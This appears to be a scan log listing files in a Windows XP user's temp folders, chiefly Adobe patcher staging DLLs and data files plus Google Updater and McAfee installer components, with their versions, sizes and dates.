1912.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1912.dll -> Adobe Systems Incorporated [Ver = 2.0.1.1504 | Size = 346624 bytes | Modified Date = 11/6/2007 11:36:26 AM | Attr =    ]
1966.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1966.dll -> Adobe Systems Incorporated [Ver = 2.11.36 | Size = 846336 bytes | Modified Date = 11/6/2007 11:36:16 AM | Attr =    ]
1982.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1982.dll -> Adobe Systems Incorporated [Ver = 4.0.0.76626 | Size = 110592 bytes | Modified Date = 11/6/2007 11:36:16 AM | Attr =    ]
1983.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1983.dll ->  [Ver = 4.1-s010, 46.282696, Mon Apr 02 2007 18:36:42 | Size = 176128 bytes | Modified Date = 11/6/2007 11:36:26 AM | Attr =    ]
1987.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1987.dll -> Adobe Systems Incorporated [Ver = 5, 1, 0, 1504 | Size = 496128 bytes | Modified Date = 11/6/2007 11:36:32 AM | Attr =    ]
1997.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1997.dll -> Adobe Systems Incorporated [Ver = 10.0 (10.0x001) | Size = 12271616 bytes | Modified Date = 11/6/2007 11:36:36 AM | Attr =    ]
2018.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2018.dll -> Adobe Systems, Incorporated [Ver = 3.7.72 | Size = 557056 bytes | Modified Date = 11/6/2007 11:36:16 AM | Attr =    ]
2053.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2053.dll -> Adobe Systems, Incorporated [Ver = 3.0.0.63netio24 | Size = 204800 bytes | Modified Date = 11/6/2007 11:36:28 AM | Attr =    ]
2065.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2065.dll -> Adobe Systems Incorporated [Ver = 4.0.0.76626 | Size = 9728 bytes | Modified Date = 11/6/2007 11:36:28 AM | Attr =    ]
2086.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2086.dll -> Adobe Systems, Incorporated [Ver = 3.2.0.275 | Size = 647168 bytes | Modified Date = 11/6/2007 11:36:14 AM | Attr =    ]
2104.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2104.dll -> Adobe Systems Incorporated [Ver = 4.0.0.76626 | Size = 118784 bytes | Modified Date = 11/6/2007 11:36:22 AM | Attr =    ]
2111.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2111.dll -> Adobe Systems, Incorporated [Ver = 3.0.0.63netio24 | Size = 77824 bytes | Modified Date = 11/6/2007 11:36:36 AM | Attr =    ]
2149.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2149.dll -> Adobe Systems Incorporated [Ver = 4.0.0.76626 | Size = 131072 bytes | Modified Date = 11/6/2007 11:36:28 AM | Attr =    ]
2162.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2162.dll -> Adobe Systems Incorporated [Ver = 2.0.1.1504 | Size = 342016 bytes | Modified Date = 11/6/2007 11:36:24 AM | Attr =    ]
2191.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2191.dll -> Adobe Systems, Inc. [Ver = 2.1.5.1504 (BuildVersion: 49.285477; BuildDate: Wed Apr 25 2007 12:01:03) | Size = 2666496 bytes | Modified Date = 11/6/2007 11:36:22 AM | Attr =    ]
2195.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2195.dll ->  [Ver = 4.1-f101, 46.282696, Mon Apr 02 2007 18:36:42 | Size = 339968 bytes | Modified Date = 11/6/2007 11:36:30 AM | Attr =    ]
2196.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2196.dll -> Adobe Systems, Incorporated [Ver = 3.0.0.63netio24 | Size = 360448 bytes | Modified Date = 11/6/2007 11:36:24 AM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4868\CAPS\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4868\CAPS ->  [Folder | Modified Date = 5/18/2008 3:00:42 PM | Attr =    ]
adobe_caps.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4868\CAPS\adobe_caps.dll -> Adobe Systems Incorporated [Ver = 1,0,135,0 | Size = 215040 bytes | Modified Date = 5/18/2008 3:00:42 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048 ->  [Folder | Modified Date = 5/18/2008 3:02:30 PM | Attr =    ]
InstallerResults.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\InstallerResults.dll ->  [Ver =  | Size = 153016 bytes | Modified Date = 5/18/2008 3:01:46 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\CAPS\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\CAPS ->  [Folder | Modified Date = 5/18/2008 3:01:46 PM | Attr =    ]
adobe_caps.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\CAPS\adobe_caps.dll -> Adobe Systems Incorporated [Ver = 1,0,135,0 | Size = 215040 bytes | Modified Date = 5/18/2008 3:01:46 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\RTPatch\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\RTPatch ->  [Folder | Modified Date = 5/18/2008 3:02:10 PM | Attr =    ]
patchw32.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\RTPatch\patchw32.dll ->  [Ver =  | Size = 182272 bytes | Modified Date = 5/18/2008 3:02:10 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\StagingArea\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\StagingArea ->  [Folder | Modified Date = 5/18/2008 3:02:27 PM | Attr =    ]
1108.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\StagingArea\1108.dll -> Adobe Systems Incorporated [Ver = 2.11.36 | Size = 846336 bytes | Modified Date = 10/20/2007 9:11:26 AM | Attr =    ]
1109.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\StagingArea\1109.dll -> Adobe Systems, Inc. [Ver = 2.1.2.1082 (BuildVersion: 46.278103; BuildDate: Wed Feb 28 2007 17:43:17) | Size = 2662400 bytes | Modified Date = 10/20/2007 9:11:26 AM | Attr =    ]
1110.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\StagingArea\1110.dll -> Macrovision Europe Ltd. [Ver = 11.03.005 | Size = 2527744 bytes | Modified Date = 10/20/2007 9:11:46 AM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5456\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5456 ->  [Folder | Modified Date = 5/18/2008 3:02:44 PM | Attr =    ]
InstallerResults.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5456\InstallerResults.dll ->  [Ver =  | Size = 153280 bytes | Modified Date = 5/18/2008 3:02:33 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5456\CAPS\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5456\CAPS ->  [Folder | Modified Date = 5/18/2008 3:02:33 PM | Attr =    ]
adobe_caps.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5456\CAPS\adobe_caps.dll -> Adobe Systems Incorporated [Ver = 1,0,135,0 | Size = 215040 bytes | Modified Date = 5/18/2008 3:02:33 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5456\RTPatch\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5456\RTPatch ->  [Folder | Modified Date = 5/18/2008 3:02:36 PM | Attr =    ]
patchw32.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5456\RTPatch\patchw32.dll ->  [Ver =  | Size = 182272 bytes | Modified Date = 5/18/2008 3:02:36 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5796\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5796 ->  [Folder | Modified Date = 5/18/2008 2:55:13 PM | Attr =    ]
InstallerResults.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5796\InstallerResults.dll ->  [Ver =  | Size = 153280 bytes | Modified Date = 5/18/2008 2:55:09 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5796\CAPS\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5796\CAPS ->  [Folder | Modified Date = 5/18/2008 2:55:10 PM | Attr =    ]
adobe_caps.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5796\CAPS\adobe_caps.dll -> Adobe Systems Incorporated [Ver = 1,0,135,0 | Size = 215040 bytes | Modified Date = 5/18/2008 2:55:10 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5796\RTPatch\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5796\RTPatch ->  [Folder | Modified Date = 5/18/2008 2:55:11 PM | Attr =    ]
patchw32.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5796\RTPatch\patchw32.dll ->  [Ver =  | Size = 182272 bytes | Modified Date = 5/18/2008 2:55:11 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea ->  [Folder | Modified Date = 5/18/2008 2:59:57 PM | Attr =    ]
1009.dat -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\1009.dat ->  [Ver =  | Size = 236 bytes | Modified Date = 9/19/2007 7:11:38 AM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea ->  [Folder | Modified Date = 5/18/2008 2:55:07 PM | Attr =    ]
2264.dat -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2264.dat ->  [Ver =  | Size = 14124 bytes | Modified Date = 11/6/2007 11:36:32 AM | Attr =    ]
2273.dat -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2273.dat ->  [Ver =  | Size = 14878 bytes | Modified Date = 11/6/2007 11:36:14 AM | Attr =    ]
2280.dat -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2280.dat ->  [Ver =  | Size = 11994 bytes | Modified Date = 11/6/2007 11:36:22 AM | Attr =    ]
2286.dat -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2286.dat ->  [Ver =  | Size = 12030 bytes | Modified Date = 11/6/2007 11:36:26 AM | Attr =    ]
2305.dat -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2305.dat ->  [Ver =  | Size = 12530 bytes | Modified Date = 11/6/2007 11:36:12 AM | Attr =    ]
2311.dat -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2311.dat ->  [Ver =  | Size = 14030 bytes | Modified Date = 11/6/2007 11:36:26 AM | Attr =    ]
2317.dat -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2317.dat ->  [Ver =  | Size = 14336 bytes | Modified Date = 11/6/2007 11:36:14 AM | Attr =    ]
2323.dat -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2323.dat ->  [Ver =  | Size = 14102 bytes | Modified Date = 11/6/2007 11:36:24 AM | Attr =    ]
2349.dat -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2349.dat ->  [Ver =  | Size = 14250 bytes | Modified Date = 11/6/2007 11:36:22 AM | Attr =    ]
2374.dat -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2374.dat ->  [Ver =  | Size = 14322 bytes | Modified Date = 11/6/2007 11:36:28 AM | Attr =    ]
2380.dat -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2380.dat ->  [Ver =  | Size = 14604 bytes | Modified Date = 11/6/2007 11:36:22 AM | Attr =    ]
2387.dat -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2387.dat ->  [Ver =  | Size = 14594 bytes | Modified Date = 11/6/2007 11:36:16 AM | Attr =    ]
2393.dat -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\2393.dat ->  [Ver =  | Size = 14796 bytes | Modified Date = 11/6/2007 11:36:30 AM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea ->  [Folder | Modified Date = 5/18/2008 2:59:57 PM | Attr =    ]
4593.ini -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4593.ini ->  [Ver =  | Size = 99142 bytes | Modified Date = 9/19/2007 7:11:40 AM | Attr =    ]
4597.ini -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4597.ini ->  [Ver =  | Size = 1216 bytes | Modified Date = 9/19/2007 7:11:40 AM | Attr =    ]
4598.ini -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4598.ini ->  [Ver =  | Size = 1064 bytes | Modified Date = 9/19/2007 7:11:36 AM | Attr =    ]
4599.ini -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4599.ini ->  [Ver =  | Size = 105 bytes | Modified Date = 9/19/2007 7:11:36 AM | Attr =    ]
4607.ini -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4607.ini ->  [Ver =  | Size = 21897 bytes | Modified Date = 9/19/2007 7:11:38 AM | Attr =    ]
4608.ini -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4608.ini ->  [Ver =  | Size = 57565 bytes | Modified Date = 9/19/2007 7:11:42 AM | Attr =    ]
4610.ini -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4610.ini ->  [Ver =  | Size = 20077 bytes | Modified Date = 9/19/2007 7:11:38 AM | Attr =    ]
4611.ini -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4611.ini ->  [Ver =  | Size = 4454 bytes | Modified Date = 9/19/2007 7:11:42 AM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea ->  [Folder | Modified Date = 5/18/2008 2:55:07 PM | Attr =    ]
1309.ini -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1309.ini ->  [Ver =  | Size = 99142 bytes | Modified Date = 11/6/2007 11:36:28 AM | Attr =    ]
1322.ini -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1322.ini ->  [Ver =  | Size = 21897 bytes | Modified Date = 11/6/2007 11:36:26 AM | Attr =    ]
1323.ini -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1323.ini ->  [Ver =  | Size = 57565 bytes | Modified Date = 11/6/2007 11:36:32 AM | Attr =    ]
1325.ini -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1325.ini ->  [Ver =  | Size = 20077 bytes | Modified Date = 11/6/2007 11:36:28 AM | Attr =    ]
C:\WINDOWS\Temp\gis544a5e\ -> C:\WINDOWS\Temp\gis544a5e ->  [Folder | Modified Date = 1/25/2007 9:50:19 PM | Attr =    ]
GoogleUpdater.exe -> C:\WINDOWS\Temp\gis544a5e\GoogleUpdater.exe -> Google [Ver = 2.0.748.20414.beta | Size = 123640 bytes | Modified Date = 1/25/2007 9:50:19 PM | Attr =    ]
GoogleUpdaterAdminPrefs.exe -> C:\WINDOWS\Temp\gis544a5e\GoogleUpdaterAdminPrefs.exe -> Google [Ver = 2.0.748.20414.beta | Size = 182520 bytes | Modified Date = 1/25/2007 9:50:19 PM | Attr =    ]
GoogleUpdaterInstallMgr.exe -> C:\WINDOWS\Temp\gis544a5e\GoogleUpdaterInstallMgr.exe -> Google [Ver = 2.0.748.20414.beta | Size = 581880 bytes | Modified Date = 1/25/2007 9:50:19 PM | Attr =    ]
GoogleUpdaterService.exe -> C:\WINDOWS\Temp\gis544a5e\GoogleUpdaterService.exe -> Google [Ver = 2.0.748.20414.beta | Size = 136952 bytes | Modified Date = 1/25/2007 9:50:19 PM | Attr =    ]
GoogleUpdaterSetup.exe -> C:\WINDOWS\Temp\gis544a5e\GoogleUpdaterSetup.exe -> Google Inc. [Ver = 2.0.748.20414.beta | Size = 123128 bytes | Modified Date = 1/25/2007 9:50:19 PM | Attr =    ]
SearchWithGoogleUpdate_en.exe -> C:\WINDOWS\Temp\gis544a5e\SearchWithGoogleUpdate_en.exe -> Google Inc. [Ver = 1, 2, 1128, 2480 | Size = 602552 bytes | Modified Date = 1/25/2007 9:50:19 PM | Attr =    ]
C:\WINDOWS\Temp\gis6e11b\ -> C:\WINDOWS\Temp\gis6e11b ->  [Folder | Modified Date = 4/10/2007 8:01:29 PM | Attr =    ]
GoogleUpdater.exe -> C:\WINDOWS\Temp\gis6e11b\GoogleUpdater.exe -> Google [Ver = 2.1.810.31257.beta | Size = 124152 bytes | Modified Date = 4/10/2007 8:01:29 PM | Attr =    ]
GoogleUpdaterAdminPrefs.exe -> C:\WINDOWS\Temp\gis6e11b\GoogleUpdaterAdminPrefs.exe -> Google [Ver = 2.1.810.31257.beta | Size = 184056 bytes | Modified Date = 4/10/2007 8:01:29 PM | Attr =    ]
GoogleUpdaterInstallMgr.exe -> C:\WINDOWS\Temp\gis6e11b\GoogleUpdaterInstallMgr.exe -> Google [Ver = 2.1.810.31257.beta | Size = 645880 bytes | Modified Date = 4/10/2007 8:01:29 PM | Attr =    ]
GoogleUpdaterService.exe -> C:\WINDOWS\Temp\gis6e11b\GoogleUpdaterService.exe -> Google [Ver = 2.0.767.25472.beta | Size = 136952 bytes | Modified Date = 4/10/2007 8:01:29 PM | Attr =    ]
GoogleUpdaterSetup.exe -> C:\WINDOWS\Temp\gis6e11b\GoogleUpdaterSetup.exe -> Google Inc. [Ver = 2.1.810.31257.beta | Size = 123640 bytes | Modified Date = 4/10/2007 8:01:29 PM | Attr =    ]
SearchWithGoogleUpdate_en.exe -> C:\WINDOWS\Temp\gis6e11b\SearchWithGoogleUpdate_en.exe -> Google Inc. [Ver = 2, 0, 301, 3558 | Size = 741304 bytes | Modified Date = 4/10/2007 8:01:29 PM | Attr =    ]
C:\WINDOWS\Temp\gis79cf9\ -> C:\WINDOWS\Temp\gis79cf9 ->  [Folder | Modified Date = 8/21/2007 8:48:28 PM | Attr =    ]
GoogleUpdater.exe -> C:\WINDOWS\Temp\gis79cf9\GoogleUpdater.exe -> Google [Ver = 2.2.940.34809.beta | Size = 124912 bytes | Modified Date = 8/15/2007 10:05:59 AM | Attr =    ]
GoogleUpdaterAdminPrefs.exe -> C:\WINDOWS\Temp\gis79cf9\GoogleUpdaterAdminPrefs.exe -> Google [Ver = 2.2.940.34809.beta | Size = 185840 bytes | Modified Date = 8/15/2007 10:05:59 AM | Attr =    ]
GoogleUpdaterInstallMgr.exe -> C:\WINDOWS\Temp\gis79cf9\GoogleUpdaterInstallMgr.exe -> Google [Ver = 2.2.940.34809.beta | Size = 664560 bytes | Modified Date = 8/15/2007 10:05:59 AM | Attr =    ]
GoogleUpdaterService.exe -> C:\WINDOWS\Temp\gis79cf9\GoogleUpdaterService.exe -> Google [Ver = 2.2.824.5515.beta | Size = 138680 bytes | Modified Date = 8/15/2007 10:05:59 AM | Attr =    ]
GoogleUpdaterSetup.exe -> C:\WINDOWS\Temp\gis79cf9\GoogleUpdaterSetup.exe -> Google Inc. [Ver = 2.2.940.34809.beta | Size = 124400 bytes | Modified Date = 8/15/2007 10:05:59 AM | Attr =    ]
gtfirstboot.exe -> C:\WINDOWS\Temp\gis79cf9\gtfirstboot.exe ->  [Ver =  | Size = 65536 bytes | Modified Date = 8/15/2007 10:05:59 AM | Attr =    ]
C:\WINDOWS\Temp\gisd05dc\ -> C:\WINDOWS\Temp\gisd05dc ->  [Folder | Modified Date = 2/7/2007 4:09:04 PM | Attr =    ]
GoogleUpdater.exe -> C:\WINDOWS\Temp\gisd05dc\GoogleUpdater.exe -> Google [Ver = 2.0.755.22488.beta | Size = 123640 bytes | Modified Date = 2/7/2007 4:09:04 PM | Attr =    ]
GoogleUpdaterAdminPrefs.exe -> C:\WINDOWS\Temp\gisd05dc\GoogleUpdaterAdminPrefs.exe -> Google [Ver = 2.0.755.22488.beta | Size = 182520 bytes | Modified Date = 2/7/2007 4:09:04 PM | Attr =    ]
GoogleUpdaterInstallMgr.exe -> C:\WINDOWS\Temp\gisd05dc\GoogleUpdaterInstallMgr.exe -> Google [Ver = 2.0.755.22488.beta | Size = 581880 bytes | Modified Date = 2/7/2007 4:09:04 PM | Attr =    ]
GoogleUpdaterService.exe -> C:\WINDOWS\Temp\gisd05dc\GoogleUpdaterService.exe -> Google [Ver = 2.0.755.22488.beta | Size = 136952 bytes | Modified Date = 2/7/2007 4:09:04 PM | Attr =    ]
GoogleUpdaterSetup.exe -> C:\WINDOWS\Temp\gisd05dc\GoogleUpdaterSetup.exe -> Google Inc. [Ver = 2.0.755.22488.beta | Size = 123128 bytes | Modified Date = 2/7/2007 4:09:04 PM | Attr =    ]
SearchWithGoogleUpdate_en.exe -> C:\WINDOWS\Temp\gisd05dc\SearchWithGoogleUpdate_en.exe -> Google Inc. [Ver = 1, 2, 1128, 2480 | Size = 602552 bytes | Modified Date = 2/7/2007 4:09:04 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\ -> C:\WINDOWS\Temp\McAfeeInstall (2) ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
Install.exe -> C:\WINDOWS\Temp\McAfeeInstall (2)\Install.exe -> McAfee, Inc. [Ver = 1,2,105,0 | Size = 656984 bytes | Modified Date = 1/8/2007 1:46:56 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
mcclean.exe -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\mcclean.exe -> McAfee, Inc. [Ver = 1.0.118.0 | Size = 230952 bytes | Modified Date = 8/28/2006 8:53:18 AM | Attr =    ]
McInst.exe -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\McInst.exe -> McAfee, Inc. [Ver = 2,2,107,0 | Size = 291944 bytes | Modified Date = 1/9/2007 9:04:20 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
mcclean.exe -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\mcclean.exe -> McAfee, Inc. [Ver = 1.0.118.0 | Size = 230952 bytes | Modified Date = 8/28/2006 8:53:18 AM | Attr =    ]
McInst.exe -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\McInst.exe -> McAfee, Inc. [Ver = 2,2,107,0 | Size = 291944 bytes | Modified Date = 1/9/2007 9:04:20 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msad\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msad ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
McInst.exe -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msad\McInst.exe -> McAfee, Inc. [Ver = 2,2,107,0 | Size = 291944 bytes | Modified Date = 1/9/2007 9:04:20 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msc\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msc ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
McInst.exe -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msc\McInst.exe -> McAfee, Inc. [Ver = 2,2,107,0 | Size = 291944 bytes | Modified Date = 1/9/2007 9:04:20 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
McInst.exe -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk\McInst.exe -> McAfee, Inc. [Ver = 2,2,107,0 | Size = 291944 bytes | Modified Date = 1/9/2007 9:04:20 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\vso\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\vso ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
McInst.exe -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\vso\McInst.exe -> McAfee, Inc. [Ver = 2,2,107,0 | Size = 291944 bytes | Modified Date = 1/9/2007 9:04:20 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\ -> C:\WINDOWS\Temp\McAfeeInstall (3) ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
Install.exe -> C:\WINDOWS\Temp\McAfeeInstall (3)\Install.exe -> McAfee, Inc. [Ver = 1,2,105,0 | Size = 656984 bytes | Modified Date = 1/8/2007 1:46:56 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
mcclean.exe -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\mcclean.exe -> McAfee, Inc. [Ver = 1.0.118.0 | Size = 230952 bytes | Modified Date = 8/28/2006 8:53:18 AM | Attr =    ]
McInst.exe -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\McInst.exe -> McAfee, Inc. [Ver = 2,2,107,0 | Size = 291944 bytes | Modified Date = 1/9/2007 9:04:20 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
mcclean.exe -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\mcclean.exe -> McAfee, Inc. [Ver = 1.0.118.0 | Size = 230952 bytes | Modified Date = 8/28/2006 8:53:18 AM | Attr =    ]
McInst.exe -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\McInst.exe -> McAfee, Inc. [Ver = 2,2,107,0 | Size = 291944 bytes | Modified Date = 1/9/2007 9:04:20 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msad\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msad ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
McInst.exe -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msad\McInst.exe -> McAfee, Inc. [Ver = 2,2,107,0 | Size = 291944 bytes | Modified Date = 1/9/2007 9:04:20 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msc\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msc ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
